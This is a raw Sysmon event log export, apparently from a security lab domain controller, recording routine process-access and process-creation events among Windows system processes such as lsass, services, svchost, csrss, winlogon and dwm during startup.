09:20:00.295{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052627Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.295{5EBD8912-8CBF-6151-0C00-00000000FD01}844960C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1200-00000000FD01}484C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052626Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.295{5EBD8912-8CBD-6151-0B00-00000000FD01}640680C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a16d|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052625Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.295{5EBD8912-8CBD-6151-0A00-00000000FD01}624684C:\Windows\system32\services.exe{5EBD8912-8CC0-6151-1100-00000000FD01}412C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052624Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.295{5EBD8912-8CBD-6151-0A00-00000000FD01}624860C:\Windows\system32\services.exe{5EBD8912-8CC0-6151-1000-00000000FD01}440C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052623Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.295{5EBD8912-8CBF-6151-0C00-00000000FD01}844960C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1000-00000000FD01}440C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052622Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.295{5EBD8912-8CBF-6151-0C00-00000000FD01}844960C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1100-00000000FD01}412C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052621Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.279{5EBD8912-8CBD-6151-0800-00000000FD01}496512C:\Windows\system32\csrss.exe{5EBD8912-8CC0-6151-1300-00000000FD01}360C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052620Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.279{5EBD8912-8CBD-6151-0900-00000000FD01}572996C:\Windows\system32\winlogon.exe{5EBD8912-8CC0-6151-1300-00000000FD01}360C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\SYSTEM32\dwminit.dll+2d11|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001052619Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.291{5EBD8912-8CC0-6151-1300-00000000FD01}360C:\Windows\System32\dwm.exe10.0.14393.0 (rs1_release.160715-1616)Desktop Window ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationdwm.exe"dwm.exe"C:\Windows\system32\Window Manager\DWM-1{5EBD8912-8CC0-6151-C8BC-000000000000}0xbcc81SystemMD5=C89F159A577F19F7F03C73C98D29D841,SHA256=B3E37997C1C62DD90D69EF83D6A6FC782BF9A5B8AD04A0D1528A8B7FA31AA408,IMPHASH=DDB7DE3741333EE031929A760FCD4542{5EBD8912-8CBD-6151-0900-00000000FD01}572C:\Windows\System32\winlogon.exewinlogon.exe 10341000x80000000000000001052618Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.279{5EBD8912-8CBD-6151-0B00-00000000FD01}640840C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0900-00000000FD01}572C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d7e|C:\Windows\system32\lsasrv.dll+1d1c8|C:\Windows\system32\lsasrv.dll+1c3f1|C:\Windows\system32\lsasrv.dll+1b140|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052617Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.279{5EBD8912-8CBD-6151-0B00-00000000FD01}640840C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0900-00000000FD01}572C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d7e|C:\Windows\system32\lsasrv.dll+1d1c8|C:\Windows\system32\lsasrv.dll+1c3f1|C:\Windows\system32\lsasrv.dll+1ac10|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052616Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.279{5EBD8912-8CBD-6151-0B00-00000000FD01}640840C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0900-00000000FD01}572C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d7e|C:\Windows\system32\lsasrv.dll+195f6|C:\Windows\system32\lsasrv.dll+1ab9f|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052615Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.279{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8CC0-6151-1200-00000000FD01}484C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052614Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.279{5EBD8912-8CBD-6151-0A00-00000000FD01}624420C:\Windows\system32\services.exe{5EBD8912-8CC0-6151-1200-00000000FD01}484C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052613Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.279{5EBD8912-8CBD-6151-0B00-00000000FD01}640680C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d7e|C:\Windows\system32\lsasrv.dll+1d1c8|C:\Windows\system32\lsasrv.dll+1c3f1|C:\Windows\system32\lsasrv.dll+1ac10|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052612Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.279{5EBD8912-8CBF-6151-0C00-00000000FD01}844960C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052611Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.279{5EBD8912-8CBF-6151-0C00-00000000FD01}844960C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052610Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.279{5EBD8912-8CBD-6151-0B00-00000000FD01}640680C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a16d|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052609Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.279{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8CC0-6151-1100-00000000FD01}412C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052608Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.279{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8CC0-6151-1000-00000000FD01}440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052607Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.279{5EBD8912-8CBD-6151-0A00-00000000FD01}624108C:\Windows\system32\services.exe{5EBD8912-8CC0-6151-1000-00000000FD01}440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+ddc1|C:\Windows\system32\services.exe+d3ee|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052606Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.279{5EBD8912-8CBD-6151-0A00-00000000FD01}624292C:\Windows\system32\services.exe{5EBD8912-8CC0-6151-1100-00000000FD01}412C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d3ee|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001052605Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.279{5EBD8912-8CC0-6151-1000-00000000FD01}440C:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\system32\svchost.exe -k LocalServiceC:\Windows\system32\NT AUTHORITY\LOCAL SERVICE{5EBD8912-8CC0-6151-E503-000000000000}0x3e50SystemMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001052604Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.264{5EBD8912-8CBD-6151-0A00-00000000FD01}624312C:\Windows\system32\services.exe{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052603Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.264{5EBD8912-8CBF-6151-0C00-00000000FD01}844960C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052602Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.248{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052601Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 